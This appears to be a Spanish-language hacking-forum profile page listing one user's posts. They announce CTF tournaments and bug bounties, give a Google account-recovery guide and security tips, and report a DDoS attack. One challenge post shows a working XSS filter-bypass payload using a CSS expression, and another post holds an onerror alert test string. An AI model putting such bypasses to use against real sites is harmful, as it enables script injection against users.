Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - sirdarckcat

#1
Hola

Alguien esta planeando participar en el juego de captura de bandera?

Es el  fin de semana del 17 de junio.


https://security.googleblog.com/2017/06/announcing-google-capture-flag-2017.html
#2
Hola que tal!  ;D ;D

Por favor si tienes algo mas que decir deja un mensaje. Me encantaría saber mas porqué no hay tantos participantes de habla hispana.  :huh:

Saludos!  :rolleyes:
#3
[youtube=640,360]https://www.youtube.com/watch?v=yFlkPaDo-ks[/youtube]

Hay varios trucos, alguien puede invertir la tecnica de alguno de ellos?

#4
WarZone / Nueva Puntuacion
28 Julio 2014, 11:44 AM
Hola

He cambiado la puntuacion y el rango de casi todas las pruebas basado en el numero de personas que han pasado las pruebas.
#5
:D
Copiado del foro de noticias!
Cita de: sirdarckcat en 10 Enero 2013, 20:50 PM
Google y Syscan invitan a estudiantes alrededor del mundo a participar en una competencia de seguridad y programacion para AppEngine. Pueden participar grupos de 5 estudiantes a implementar una aplicacion con seguridad en mente.


Para recibir mas informacion, suscribete en: https://groups.google.com/group/hardcode-2013/subscribe?hl=es


Para mas informacion visita: http://programa-con-google.blogspot.com/2013/01/concurso-hardcode.html

Comentarios aqui


#6
 Google y Syscan invitan a estudiantes alrededor del mundo a participar en una competencia de seguridad y programacion para AppEngine. Pueden participar grupos de 5 estudiantes a implementar una aplicacion con seguridad en mente.


Para recibir mas informacion, suscribete en: https://groups.google.com/group/hardcode-2013/subscribe?hl=es


Para mas informacion visita: http://programa-con-google.blogspot.com/2013/01/concurso-hardcode.html

#7
Desde hoy, Google pagara hasta 20mil dolares a cualquiera que les reporte vulnerabilidades de forma privada.


Esto incluye vulnerabilidades en software de codigo abierto que Google o alguna de sus adquisiciones usa como wordpress, drupal, openssl, openssh, apache, php, ruby, etc.. aunque estas no recibiran 20mil dolares, podran recibir hasta 5mil dolares. Aunque no hay una lista de software publico, pero si sabes que Google usa alguna de estas librerias, Google podria pagar por ellas.


Mas informacion aqui:
http://googleonlinesecurity.blogspot.com/2012/04/spurring-more-vulnerability-research.html


Aunque si te gustaria reportar alguna vulnerabilidad, puedes contactar directamente security@google.com (si no puedes hablar ingles, puedes usar español).


Saludos!!
#8
Recuperar contraseña de Google, GMail, Youtube

Hey! si aun tienes acceso a tu cuenta, sigue la lista de seguridad de Google: http://mail.google.com/support/bin/static.py?page=checklist.cs

La informacion aqui expuesta es simplemente un resumen de los mecanismos expuestos por google.com/support si desea informacion actualizada, vaya a aqui, la informacion expuesta en este document puede ser antigua, o estar completamente incorrecta. No tenemos ninguna relacion con Google y esta informacion es publicada como un trabajo investigativo.

Antes que nada, hay varias cosas a tomar en cuenta:
1. Si has olvidado tu password, continua en la sección de "Olvide mi password".
2. Si de pronto ya no puedes iniciar sesion, o crees que tu cuenta ha sido atacada, continua en la sección de "Recuperar acceso a mi cuenta".
3. Si quieres recuperar acceso a la cuenta de algun familiar o conocido que ha fallecido, o eres miembro de la policia continua a la sección "Acceder a cuenta de terceros".

Olvide mi password
Ok, tranquilo, en este caso las cosas deberian ser rapidas. Simplemente ve a https://www.google.com/accounts/recovery
Se te pedira:

  • Tu cuenta de correo olvidada.
  • Un CAPTCHA
  • < Pregunta Secreta >
Si iniciaste sesion el dia de hoy, o ayer, puede que no puedas recuperar tu cuenta por tu pregunta secreta, en cuyo caso deberas recuperarla por tu cuenta de correo alternativa. Si no tienes cuenta de correo alternativa, o ya no tienes acceso a esas cuentas, entonces podrias recuperar por un SMS que te enviaria Google, si no registraste ningun telefono, entonces, mala suerte :( continua a la sección de Recuperar Acceso a mi Cuenta.

Para la proxima, recuerda agregar informacion para la recuperacion de tu cuenta.

Recuperar Acceso a mi Cuenta

Para evitar errores, visita https://www.google.com/accounts/recovery coloca tu correo, resuelve el CAPTCHA y responde a las preguntas. Al final te deberia mandar a:

https://www.google.com/support/accounts/bin/request.py?contact_type=acc_reco&ctx=acc_reco&source=no_ts

Pero es preferible que lo hagas desde accounts/recovery ya que el link podria ser diferente dependiendo de la configuracion de tu cuenta.

Para continuar este proceso, sera necesario que tengas acceso a otra cuenta de correo donde Google te pueda contactar. Se te preguntaran diversas preguntas para que Google pueda validar que en realidad has perdido acceso a tu cuenta. Trata de llenar toda la informacion que recuerdes. No hay problema si no recuerdas algunos datos, solo llenala lo mejor posible.

Pon toda la informacion que recuerdes, aunque haya algunos errores, tu trata lo mejor posible de llenar el formulario, ya que lo termines, saldra un mensaje diciendo que en 24 horas se pondran en contacto contigo. Espera 24 horas. Puede ser posible que Google te contacte diciendo que la informacion no es suficiente, o que no es posible confirmar que la cuenta es tuya. Te recomiendo intentes denuevo despues de unos dias y si puedes ya que tengas mas informacion.. Entre mas tiempo haya pasado desde que iniciaste sesion por ultima ves, sera mas probable que te den acceso a tu cuenta. Cabe mencionar que en la mayoria de los casos, hay una persona detras de ese formulario.

Si tu cuenta era de Youtube, te recomiendo uses:
http://www.google.com/support/youtube/bin/request.py?contact_type=compromised_account

Acceder a una cuenta de terceros
Si tienes una razon legal o razonable para acceder a la cuenta de otra persona (la persona fallecio, eres miembro de la policia, etc..), la peticion debera ser hecha por FAX o correo postal a la oficina de Google.

Para acceder a una cuenta de una persona que fallecio, sigue estas instrucciones: http://mail.google.com/support/bin/answer.py?answer=14300

Para pedir acceso por algun motivo legal a Google, y que sea valida con los terminos de servicio, y politica de privacidad, deberas:
1. Recopilar toda la informacion legalmente necesaria. Contacta a un abogado para que te de un listado, ya que esto es distinto de pais a pais.
2. Informacion de contacto (tuya), para que Google pueda responderte. Asi como credenciales que te acrediten a acceder a dicha informacion.
3. La direccion de correo a la que quieres acceder.
4. Una carta firmada o sellada, explicando el motivo por el cual se quiere acceder a la informacion y mencionar con exactitud que informacion quieres acceder.
5. Una traduccion certificada en ingles de todos los documentos antes mencionados.

Estos, se deben mandar con una cabecera dirigida a:
Google Legal Team

Y a la direccion de la oficina de Google de tu pais: http://www.google.com/corporate/address.html
La de las oficinas centrales, es:
CitarGoogle Inc.
1600 Amphitheatre Parkway
Mountain View, CA 94043
United States of America

y al Fax de tu oficina de Google local: http://www.google.com/corporate/address.html
El de las oficinas centrales, es: +1 650 253 0001

Citar
Tips de seguridad

Cuida las redes de donde inicias sesion
1. Redes wifi abiertas en cafes (Starbucks?), universidades, hoteles y parques son lugares comunes donde se roban passwords y cookies. Si debes iniciar sesion de lugares de ese tipo, te recomiendo contrates un servicio de VPN.
2. Asegurate, que los sitios web que visitas inician con https:// como https://encrypted.google.com/ https://docs.google.com/ https://www.youtube.com/ etc..
3. De ser posible, si no necesitas iniciar sesion cuando usas estos sitios, usa navegacion "incognito" o "privada" que no incluye cookies y no inices sesion.


Precauciones si necesitas recuperar tu cuenta
Visita https://www.google.com/accounts/b/0/UpdateAccountRecoveryOptions para configurar estas opciones.
1. Asegurate de enlazar una cuenta de correo externa a tu cuenta de Google (la de tu trabajo, o similar).
2. Elige preguntas secretas que nadie pueda adivinar. Recuerda que hoy en dia mucha informacion es publica en redes sociales, por lo que eligela correctamente.
3. Agrega un numero de telefono a usar por si todas las otras opciones no funcionan!


Protege tu password
1. Antes de escribir tu password verifica que la direccion en tu navegador empieza con https://www.google.com/
2. No uses como password tu telefono, nombre de tu pareja, o mascota, o equipo o banda favorita, fecha de nacimiento, direccion o cualquier informacion que se pueda descubrir por redes sociales como facebook, foursquare, etc..
3. Asegurate que tu password en Google sea diferente al que tienes en otros lugares, como twitter, tiendas, foros, etcetera..
4. Cambia tu password frecuentemente!

Manten tu computadora segura
1. Si usas windows, asegurate de mantener tu computadora con las ultimas actualizaciones de seguridad, no ejecutes ninguna aplicacion que no confies completamente, y usa un antivirus actualizado (gratis: http://www.microsoft.com/security_essentials/).
2. No descargues warez, cracks, keygens, etcetera. Estos muy frecuentemente estan infectados. Si necesitas ejecutar un programa de este tipo, pregunta en nuestro foro de seguridad primero (aqui: http://foro.elhacker.net/seguridad-b23.0/). Toma las mismas precauciones con Torrents y links de descarga directa, incluso los que encuentres en este foro.
3. Manten tu navegador actualizado.. Pon mucha atencion a las alertas de seguridad de tu navegador, y no des click en "Aceptar" a menos que entiendas completamente lo que dice.

-> Si no usas windows, se prudente, no ejecutes scripts de sitios que no confias. Aunque la prensa no lo sepa, si hay virus en Mac y en Linux.

Usando computadoras publicas
1. No inicies sesion en lugares publicos, como cibercafes, hoteles, y kioskos en aeropuertos o lobbys.
2. Si algun dia necesitas iniciar sesion en dichos lugares, asegurate de cerrar tu sesion al terminar, y de no guardar tu password en el navegador. Para extra seguridad, cambia tu password tan pronto como sea posible.
3. Si necesitas iniciar sesion en computadoras publicas a menudo, ya que viajas, o no tienes computadora propia, te recomiendo habilites 2FA, es un servicio gratuito de Google que te pide inicies sesion con tu usuario, tu password, y una clave numerica aleatoria, que puedes guardar en tu telefono, o puedes pedir que te lo manden por SMS o por una llamada. Para activarlo ve a: https://www.google.com/accounts/b/0/SmsAuthConfig.

Tengan mucho cuidado! Cualquier duda, posteen aqui mismo una respuesta, y vere si puedo ayudar.
#10
Tras el exito obtenido por Google en su programa para recompensar investigadores que encuentren vulnerabilidades en Chrome, Google ahora lanzo un nuevo programa que recompensara a quien encuentre y les reporte vulnerabilidades de nivel web. El premio tendra una base de 500 dolares, y si el bug es especialemente interesante podria llegar hasta con $3,133.7 dolares (alrededor de 2,234 euros).


Los servicios se limitan a orkut.com, google.com, youtube.com y blogger.com, y abarcan vulnerabilidades que afecten la privacidad y seguridad de los usuarios, como vulnerabilidades de Cross Site Scripting, SQL Injection, CSRF, XSI, etc.. mientras que quedan prohibido atacar las cuentas de otras personas (solo puedes atacar tu propia cuenta o cuentas de prueba) asi como vulnerabilidades como denegacion de servicio, ingenieria social, y ataques a la infraestructura de Google.


Si decides reportar una vulnerabilidad en Google, te recomendamos hacerlo a security@google.com (si se te hace mas comodo reportarlo en espa;ol no hay problema). Si prefieres donar tu recompensa a alguna institucion de caridad, Google duplicara el total.


Referencias:
http://googleonlinesecurity.blogspot.com/2010/11/rewarding-web-application-security.html


#11
En Enero del 2010, Ben Manyard contacto a los desarrolladores de OpenCart, para reportar un par de vulnerabilidades. Estas vulnerabilidades podrian permitir a un atacante cambiar la cuenta de pago de la instalacion y tomar control total de la aplicacion.

A este correo, el desarrollador de OpenCart Daniel Kerr, respondio burlandose de el, y pidiendole que deje de hacerle perder el tiempo.

Ben Manyard, consecuentemente publico un post en su blog: http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/ reportando los hechos, a lo cual en los comentarios el mismo desarrollador de OpenCart (Daniel Kerr) entro a demostrar que no solo no entendia la vulnerabilidad (diciendo que paypal, google, y todos los bancos del mundo son vulnerables a CSRF, cosa que no es verdad), sino sugiriendo que los antivirus protegian contra estos ataques (cosa que tampoco es verdad).

La discusion continuo, y Ben Manyard llego a la conclusion que la unica forma de ayudar a las personas, era haciendo un fork de OpenCart, con los parches (dado que OpenCart se nego a arreglarlas) el cual hizo.. Sinembargo no duro mucho, antes que los desarrolladores de OpenCart sabotearan su codigo, para que sus parches no pudieran funcionar (http://blog.visionsource.org/2010/03/29/opencart-secured-issue/).

Es asi, como todas estas vulnerabilidades, aun hoy en dia, se encuentran existentes en todas las instalaciones de OpenCart, sin ningun parche disponible, los desarrolladores se niegan a arreglarlas (debido a que no las entienden), y decenas de miles de usuarios se encuentran en peligro de perder cantidades considerables de dinero. (Como podemos observar al buscar Powered by OpenCart en Google).

Que recomendamos? no usar OpenCart.

Saludos!!
#12
Foro Libre / Canal IRC de elhacker.net
13 Mayo 2010, 06:57 AM
El Canal Ha Sido Cerrado!

No hemos tenido suficiente actividad en el canal, y decidimos dejar de mantener el servicio.


#13
 [youtube=425,350]http://www.youtube.com/watch?v=Bv4JTKl2yW8[/youtube]
Un amigo esta haciendo experimentos para tratar de demostrar la existencia de la psicoquinesis, y quiere ayuda para ideas de como demostrar que no es falso.


Este es el primer video, en el siguiente demostrara que no es conveccion, al mostrar como pone sus manos en agua fria antes de iniciar el experimento, le he sugerido cambiar los materiales por papel y un palillo para evitar ideas de dilatacion de metales y magnetismo, alguna otra sugerencia?

Saludos!!


--edit--
Otra cosa que podria levantarle las cejas a mas de uno es porque cuando termina de moverla, la quita de la base? Como si no la quitara podria seguir moviendose.

Otra cosa es porque se cambia de posicion (aunque esa puede ser porque sino taparia su mano la camara), aunque dado que el sol esta de tal lado, podria hacerse un efecto similar a un radiometro de crookes por la sombra que ejerce la camara o similar.
#14
Nivel Web / [CYH] Bypass de filtros de XSS :)
8 Abril 2010, 08:47 AM
Can You Hack?
Semi-allowhtml

CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos :D



Hola!

Los invito a h4x0r3ar este filtro de XSS:
http://allowhtml.com/demo/

Yo lo bypasee hace rato xD
<div style="xss=\000065xpression(confirm(1))!: url('xD');">hola</div>

Asi que no esta muy dificil!

Los 2 que encuentren mas bypasses antes del 8 de mayo, se ganan cuentas @elhacker.net

Saludos!!
#15
Hola!

Les vengo a proponer algo :)

Veran, hace tiempo, discovery channel hizo un concurso llamado I love the world, con un video, del cual salio un comic de xkcd y de ese, salio un video, y estaba pensando, que eso de pasar de imagen a video no es muy dificil con flash.. jaja

el video es este, la idea es algo similar pero sin animacion:
[youtube=425,350]http://www.youtube.com/watch?v=DHoDsZDMH_Y[/youtube]

Entonces mi propuesta no es hacerlo igual, de I love the world, ni comic, sino algo mas como una linea de tiempo de 800 x 300, pero que pueda ser extendida cualquier cantidad de veces... simplemente uniendo varios..

Cada usuario podra mandar de 1 a 5 viñetas, e idealmente llegaremos como a 20 o mas xD y haremos una historia usando tales viñetas.. y despues lo subimos a youtube jajajaja que opinan?

Las reglas serian, que los ultimos 2 pixeles de los lados, sean completamente blancos (es decir, puedes tener un fondo disinto pero este debe verse bien considerando que los ultimos pixeles seran bancos.. vean este ejemplo de degradado:



sinembargo, pueden poner sus 5 viñetas juntas, en cuyo caso solo la primera y la ultima necesitaria el margen blanco.

pueden poner cualquier cosa xD


al final unimos las viñetas en algun orden..

y le ponemos una historia de subtitulos, con algun tema musical de fondo o yo que se.. que opinan? les gusta?

Saludos!!
#16
puse un experimento, los que lo vean genial!

podrian llenar la encuesta cuando vean el experimento porfavor? solo chequen en temas destacados va a decir que estas participando en un experimento, y que envies feedback..

si recibe mal feedback del STAFF o de los usuarios, probablemente no se implemente..

lo veran tarde o temprano, no se preocupen!

lo que va a cambiar:
* no saldra screenshot para links internos, pero saldra algo que hara notar que es un link interno (el logo podria ser)
* links a bit.ly y cosas de esas no tendran screenshot
* links a rapidshare/megaupload, no tendran screenshot

Saludos!!
#17
:¬¬ necesitamos personas que nos ayuden a algo para el IRC


solo usuarios con antiguedad menor a 6 meses o menos de 300 mensajes..
#19
Recopilatorio de Temas del foro de Nivel Web del mes de Noviembre

Proyectos

Auditoría de seguridad hacia Simple Machines Forum 2.0
http://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html
Auditoria a SMF por parte del equipo de SimpleAudit de elhacker.net ( http://labs.elhacker.net/simpleaudit )

Herramientas hechas por nuestros usuarios

Script para extraer datos de bsqli en python (nacho87)
http://foro.elhacker.net/nivel_web/script_para_extraer_datos_de_bsqli_en_python-t272842.0.html
Herramienta en python para explotación de vulnerabilidades de Blind SQLinjection.

[Tool][python] Mi herramienta para SQLi en mysql
http://foro.elhacker.net/nivel_web/toolpython_mi_herramienta_para_sqli_en_mysql-t276135.0.html
Herramienta hecha con la finalidad de simplificar la explotación de vulnerabilidades de SQL injection.

Bot MySQL Search Google 2.0 (MagnoBalt)
http://foro.elhacker.net/nivel_web/bot_mysql_search_google_20-t271218.0.html
Bot que busca en google y confirma webs vulnerables a SQL injection automaticamente.

Vulnerabilidades descubiertas por nuestros usuarios

Backdoor nativo en SMF 2.0 (WHK)
http://foro.elhacker.net/nivel_web/backdoor_nativo_en_smf_20-t272107.0.html
Se encontro un backdoor en SMF 2.0 como parte de la auditoria a SMF 2.0 del equipo de Simple Audit

Exploit en osCommerce Online Merchant v2.2 RC2a (CODE:NIAL)
http://foro.elhacker.net/nivel_web/exploit_en_oscommerce_online_merchant_v22_rc2a-t274615.0.html
Vulnerabilidad de Remote File Disclosure en OsComerce

Vulnerabilidad XSS en tuenti. (braulio23)
http://foro.elhacker.net/nivel_web/vulnerabilidad_xss_en_tuenti-t272504.0.html
Se describe una vulnerabilidad encontrada en la red social tuenti

Mas que un bug o vulnerabilidad una imbecilidad (el-pollo)
http://foro.elhacker.net/nivel_web/mas_que_un_bug_o_vulnerabilidad_una_imbecilidad-t275064.0.html
Pagina web de CencoSud (chile) permite a cualquier atacante revelar la informacion de una persona desde el RUT.

xss en goear.com (el-pollo)
http://foro.elhacker.net/nivel_web/xss_en_goearcom-t273533.0.html
Se describe una vulnerabilidad de XSS y de SQLinjection encontrada en goear.com

XSS en Google Talk 1.0.0.105 (WHK)
http://foro.elhacker.net/nivel_web/xss_en_google_talk_100105-t271114.0.html
Vulnerabilidad de XSS en Google Talk descubierta por WHK

XSS encontrado en fotolog.com (fede_cp)
http://foro.elhacker.net/nivel_web/xss_encontrado_en_fotologcom-t275060.0.html
Vulnerabilidad de XSS encontrada en fotolog.

Temas interesantes

Usar mod_rewrite como WAF (O.G.T.)
http://foro.elhacker.net/nivel_web/usar_modrewrite_como_waf-t273394.0.html
Se describen los motivos por los cuales no se debe usar mod_rewrite como WAF, con ejemplos.

evitar XSS en eval(noFi#)
http://foro.elhacker.net/nivel_web/evitar_xss_en_eval-t274302.0.html
Se describe como se debe filtrar cuando se va a poner informacion en ‭‬javascript

Hackea a elhacker.net (WHK)
http://foro.elhacker.net/nivel_web/hackea_a_elhackernet_finalizado_ganador_yasion-t275475.0.html
Concurso (finalizado) de encontrar una vulnerabilidad de XSS en SMF (2 vulnerabilidades fueron encontradas).

#20
pues warzone tiene 5 diseños por lo pronto.

el que estamos usando ahorita lo hizo azielito, pero si ustedes algun dia hicieron un diseño que nunca usaron, o tienen ganas de hacer algo interesante.. ponganlo aqui y lo pongo en warzone.

no es que warzone necesite diseños, es que creo es divertido tener muchos diseños y se van a necesitar para una prueba que se esta haciendo... pongan los que quiera asi sean geniales, interesantes, chistosos, raros, feisimos, originales, etc..

lo unico es que deben dejar espacio para el menu y el contenido pero fuera de eso, todo se vale.. el diseño debe estar en HTML.. obviamente.

solo no pondre porno o imagenes grotescas o ofensivas.. bueno..

Saludos!!
#21
Hola!

Pues antes que nada me gustaria avisarles de la existencia de la wiki de elhacker.net.. muchos no saben de su existencia porque no se le ha hecho mucha publicidad que digamos, ni en la web ni el foro ni nada.

La web es http://wiki.elhacker.net/ y como podran ver tiene mucha información ya!  :D, pero hay un problema  :-\ es fea.

Antes que nada, la sección de diseño gráfico está mas que vacia, si hay algún voluntario dispuesto a poner tutoriales del foro y demas, se ganara su hermosa nueva y reluciente cuenta @elhacker.net jaja.. junto con acceso a varios servicios que hay ahi (algunos publicos, otros secretos, y otros en desarrollo.. como el irc), y formar parte del grupo de la Wiki.

En cualquier forma! eso no es por lo que vengo principalmente, lo que quiero es que nos ayuden con logos, porque se ve medio aburrida la portada de la wiki como está ahorita.. No es un concurso ni nada, es simplemente encontrar a alguien que este dispuesto a quedar encargado de poner/quitar logos en la portada de la wiki (se estaran agregando/quitando categorias con el tiempo), asi como tambien de los labs de elhacker.net: http://labs.elhacker.net/ (esta ultima web tambien es medio top secret xD) esta ultima solo necesita 4 logos, para las 4 secciones. El encargado obviamente tendria su cuenta @elhacker.net y formaria a ser parte del grupo Wiki del foro.

Si hay mucha gente que quiere formar parte (ojala! jajaja), tambien puede ser posible que se unan mas personas al equipo si estan dispuestos a unificar el "estilo" de la wiki (es decir que todos los articulos tengan la misma fuente, dividir articuos exajeradamente grandes en 2 o 3, que los encabezados esten bien, etc..).

Que opinan?

Saludos!!
#22
WarZone / Crackme_crackeame
20 Octubre 2009, 12:23 PM
la nueva prueba tiene a mi amigo stallone como personaje principal :xD


es mi prueba favorita ^.^ o la de la escuelita?

no se xD

voy a hacer una restructuracion de puntuaciones y de rangos

Saludos!!
#23
Proyecto de Auditoria a SMF 2.0 - Laboratorio de Bugs/Nivel Web

Este es un proyecto abierto a todos los usuarios de elhacker.net

Hace tiempo se hizo una propuesta de hacer un proyecto de auditoria a SMF 2.0.

El dia de hoy lo vengo a formalizar, y a formar el grupo, el límite es 5 personas, el proyecto estará lidereado por WHK y yo. Las vulnerabilidades encontradas se documentarán en un proyecto privado y cuando se considere prudente se harán públicas (junto con el parche).

El objetivo es simplemente estar listos para cuando el foro tenga que actualizarse a SMF 2.0, y asegurarnos de tener un foro seguro.

Los que deseen participar posteen su interes a continuación, asi como una descipción de porque ustedes deben ser parte del proyecto antes del 8 de noviembre.

La actividad del proyecto será publicada en:
http://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html

Saludos!!
#24
alguien sabe donde puedo conseguir un servicio que me de una shell (ssh/telnet) gratis en latinoamerica (mejor si es en mexico, argentina o chile)?

como sdf.lonestar.org sign.io etc..

ssh o telnet me da iwal.. no necesito privilegios nomas es usar traceroute (automaticamente).

hay universidades, bachilleratos, etc.. que dan ese servicio publicamente.

Saludos!!
#25
Nivel Web / xsspruebas
8 Septiembre 2009, 12:58 PM
location=lolx onerror=alert(1) x
#26
Hola!

Hace tiempo hice este documento, pero lo deje incompleto (50%), y ahora no tengo ni la memoria para terminarlo, ni el tiempo, así que lo he subido a la wiki.

http://wiki.elhacker.net/electronica/arquitectura-de-datos-y-sistemas-digitales

Quienes esten dispuestos a terminarlo, puede ser en equipo, digame y los hacemos editor de la wiki (con la cuenta @elhacker.net que amerita).

Ademas la sección de electronica no tiene a nadie encargado, así que si alguien esta dispuesto a recolectar informacion del foro para subirla, igual aviseme.

Saludos!!
#27
Se ha hecho un torneo nuevo de elevación de privilegios llamado Torneo_Root.

El objetivo, es obtener root en el servidor, por cualquier manera posible.

Va a estar online por 1 mes exactamente

El primero que lo logre tendra puntos extra y una cuenta @elhacker.net con acceso a todos sus servicios.

Se daran puntos extras por cualquier vulnerabilidad local en el sistema que afecte la integridad del torneo.

Los detalles estan en:
http://warzone.elhacker.net/pruebas.php?p=56

Obtienen su login en el servidor en:
http://warzone.elhacker.net/wzon.php

Se conectan por SSH al puerto 22 (para usuarios de windows pueden usar PuTTy).

Fue hecha con la colaboración de hackbsd.org

Diviertanse!!

Saludos!!
#28
Aquí se presentarán las estadísticas del ataque que recibió el foro en el mes de febrero.

CitarEn tan solo el mes de febrero, hemos calculado que aproximadamente 16,691 personas han sido infectadas con un virus que se propaga vía MSN Messenger, con el objetivo de realizar ataques de denegación de servicio, generando 6,331,995 peticiones en 189,723 ataques, desde 67,333 direcciones IP, 885 ISPs, y 67 países distintos.

Pueden descargar el reporte del ataque de aquí:

Reporte del DDoS

Y el reporte de Analytics aquí:

Reporte de Google Analytics


El horario usado en los reportes es GMT-6.

Se va a presentar otro reporte con algunos datos técnicos del análisis que se le ha hecho al bot de netzeek.

Cabe mencionar que el reporte de Analytics es exclusivamente de los bots, las visitas reales del foro se controlan en otro perfil.

Se presenta este reporte mas que nada para compartir con ustedes el tipo de ataque que se está recibiendo. En general el foro ha recibido ataques mucho mas fuertes en el pasado, pero por primera vez presentaremos estadísticas públicamente.

Algunas de las gráficas del documento de la interpretación de los datos:

Cantidad de personas infectadas contra cantidad de personas desinfectadas


Cantidad de ataques recibidos por bots nuevos (azul) contra bots que ya habian atacado antes (rojo), el total es la suma de ambas gráficas.


Saludos!!
#29



Resultados del Primer Torneo de Explotacion de Servidores
y
Anuncio de Torneo Capture The Flag

http://warzone.elhacker.net/



En este mensaje se van a dar a conocer los resultados del Primer Torneo de Explotacion de Servidores en WarZone, (Dic 2008), elaborado por Anon, y que Inicio el 29 de Noviembre del 2008 y concluyo el 15 de Diciembre del 2008.

La cantidad de usuarios que participaron en este torneo fue 158 en total, de los cuales solo 13 lograron tener puntuacion.

Cabe mencionar, que los "bonus" formaban una parte muy importante de este torneo, y debido a estos, el ganador del primer lugar del torneo no es el que recibio la mayor cantidad de puntaje, ya que no participo en ninguno de los bonus.

El participante que termino primero, y el que se lleva el reconocimiento como haber ganado en primer lugar es zosen (http://warzone.elhacker.net/perfil.php?u=5226), muchas felcidades!.

El otro usuario que termino, y gano el torneo tambien es sylkat (http://warzone.elhacker.net/perfil.php?u=5420)

Tal y como lo mencionamos se les daran 30 puntos en warzone, asi como una promocion de 2 rangos, una cuenta de correo @elhacker.net, asi como acceso a todos sus servicios.

sylkat ademas, fue el que tardo menos en resolver el torneo, sylkat resolvio el torneo en 7 dias, y zosen en 12, es asi que a sylkat se le dan 15 puntos extra por resolver el Torneo en la menor cantidad de tiempo (para un total de 45 puntos).

Otro participante que tuvo un papel sobresaliente en el torneo fue un00 (http://warzone.elhacker.net/perfil.php?u=5471), que nos rooteo el servidor, dejando un mensaje en el MOTD, tal como lo pediamos, en caso de que alguien lo lograra.

un00 parece ser que es el lider del proyecto WEPLab, (http://weplab.sourceforge.net/), un laboratorio para el analisis y depuracion de WEP, el tampoco nos pidio que le hicieramos publicidad a su proyecto, pero creo yo que tambien es un proyecto muy interesante, y tambien vale la pena mencionarlo.

Tal y como lo dijimos, un00 tendra 20 puntos extra en warzone, y se le reconoce como finalista del torneo en tercer lugar, tiene asi tambien 30 puntos en warzone (para un total de 50 puntos), asi como una promocion de 2 rangos, una cuenta de correo @elhacker.net, asi como acceso a todos sus servicios.

Asi tambien, hemos decidido (ya que no hubo mucha participacion en la documentacion de las pruebas), darle a blackngel 15 puntos extra por su documentacion de las primeras dos pruebas del Torneo, esta documentacion estara disponible junto con el codigo fuente y los detalles del Torneo (detalles tecnicos, en caso de que tengan curiosidad), y de como fue el rooteo del servidor por parte de un00.

Ademas a los usuarios que hayan pasado solo 1 o 2 niveles (sin ser reconocidos como ganadores o finalistas), se les daran 3 puntos por nivel pasado.

Es decir que a los 4 usuarios que solo pasaron el primer nivel (BoF):
# sch3m4
# alt3kx
# raise_enyesec
# becquer

Se les daran 3 puntos por haber pasado este primer reto.

A todos los que encontraron como iniciar sesion en el servidor desde Apache, se les daran 5 puntos extra.

Por ejemplo, en el caso de blackngel se le daran 8 (2 + 3 x 2) puntos, mas los 15 extra por la documentacion, que dan un total de 23 puntos.

Es importante recalcar que este puntaje, les da a los ganadores una ventaja importante sobre todos los demas participantes de warzone, lo que les permitira tener una ventaja decisiva en caso de que quisieran resolver el resto de las pruebas.

En conclusion la lista de puntuaciones para este torneo es:

  • un00 - 50 puntos
  • sylkat - 45 puntos
  • zosen - 30 puntos
  • blackngel - 23 puntos
  • sch3m4 - 8 puntos
  • alt3kx - 8 puntos
  • szemog - 5 puntos
  • hades - 5 puntos
  • backtracker - 5 puntos
  • castillo - 5 puntos
  • pacojaco - 5 puntos
  • raise_enyesec - 3 puntos
  • becquer - 3 puntos


Notas:
> Las puntuaciones se colocaran en un maximo de 24 horas (a mas tardar Jueves 18 de Diciembre a media noche, GMT-6).
> La puntuacion a blackngel se le dara cuando envie la documentacion final, y esta se publicara en este mismo mensaje.
> Nos tardamos en publicar este mensaje porque queriamos publicar simultaneamente el siguiente anuncio:

Torneo de CTF warzone.elhacker.net 2009.

Hemos decidido organizar un torneo de CTF para principios del 2009.

(Capture The Flag), al estilo de las DefCon CTF Prequalifications.

Este Torneo sera por equipos de maximo 3 personas, y requerira conocimientos en Redes, Seguridad nivel Web, Vulnerabilidades nivel aplicacion (similares a Torneo_Shell), e Ingenieria Inversa.

Los servidores ya estan siendo configurados e instalados en estos momentos.

Avisaremos cuando tengamos mas noticias.

Felices fiestas!
#30
WarZone / Torneo de explotacion de servidores
15 Noviembre 2008, 17:24 PM
http://warzone.elhacker.net/blog/2008/11/torneo-de-explotacion-de-servidores.html

CitarPara obtener sus datos de inicio de sesion al servidor, deben acceder a..
http://warzone.elhacker.net/wzon.php

Ahi mismo meten los datos de lo de confirmacion que les da el mismo server cuando terminan el torneo.

Saludos!!

Citar> NO USAR SCANNERS DE VULNERABILIDADES WEB o se les baneara del servidor por flood.
> Si hacen un scan con nmap, el resultado sera el puerto 80 abierto, y el SO FreeBSD.. NO HAY MAS PUERTOS ABIERTOS.
> Se les da una shell a todos los participantes en el servidor, LA PRIMERA PARTE DE LA PRUEBA ES ENCONTRARLA.

Torneo de explotacion de servidores

Sabemos que muchos de ustedes querian explotar vulnerabilidades en aplicaciones binarias, como buffer overflows, heap overflows, etc..asi tambien nos han pedido pruebas de vulnerar un servidor.

En fin, creemos eso es una buena idea, pero no podemos montar tales pruebas en un servidor nuestro por seguridad, y no lo podemos virtualizar, por rendimiento.. asi que Anon organizara un wargame de este tipo, y le pedi que si podia hacernos el favor de organizarlo para los usuarios de warzone, y dijo que si! entonces..

El dia Sabado 29 de Noviembre del 2008 a media noche, horario GMT (Meridiano de Greenwich/Casablanca), Viernes 28 a las 6:00 pm en la ciudad de mexico (GMT-6), Viernes 28 a las 9:00pm en Buenos Aires (GMT-3),  Sabado 29 a la 1:00 am en Madrid (GMT+1), se publicara en warzone una prueba en la cual los usuarios podran obtener la direccion del wargame, junto con sus datos de inicio de sesion.

El objetivo sera ir pasando desde 4 niveles, explotando vulnerabilidades en los ejecutables dentro del mismo, permisos, etcetera.

Los primeros 5 que pasen la prueba, se les daran 30 puntos en warzone, asi como una promocion de 2 rangos (maximo rango: elite, los que ya esten en elite, pasaran a nightmare.), una cuenta de correo @elhacker.net, asi como acceso a todos sus servicios.

Los siguientes 5, recibiran 15 puntos en warzone, una promocion de 1 rango (no podran pasar a nightmare, los elite).

